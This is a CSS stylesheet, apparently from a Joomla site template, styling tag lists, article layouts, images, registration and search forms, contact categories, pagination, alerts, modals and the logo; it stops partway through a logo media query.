.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #0077bb;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #00466e;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #00466e;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #0077bb;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #0077bb;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #00466e;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #00466e;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: left;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-left: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-right: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-right: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-right: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-left: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-right: 0;
  margin-left: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-left: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-left: 15px;
  margin-left: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  left: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-left: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-left: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-left: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-left: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #00466e;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #0077bb;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #bbe6ff;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 991px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #88d4ff;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #0067a2;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #0067a2;
  }
